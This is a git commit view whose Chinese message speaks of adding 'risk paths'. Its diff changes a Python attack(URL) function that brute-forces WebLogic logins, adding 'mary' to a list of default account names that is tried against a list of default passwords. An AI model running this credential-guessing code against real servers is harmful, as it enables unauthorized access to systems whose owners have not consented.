[fix]删除不必要模块,增加可能的风险路径

This commit is contained in:
rpkr
2022-03-21 14:26:57 +08:00
parent 59a1b3f8f9
commit ef35be4029
9 changed files with 5 additions and 167 deletions

View File

@@ -13,7 +13,7 @@ def attack(URL):
#设定用于爆破的账户密码
a = 0
accounts = ['guest','WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','portaladmin']
accounts = ['guest','WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','portaladmin','mary']
passwds = ['guest','weblogic1','WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd','portaladmin']
for account in accounts:
for passwd in passwds: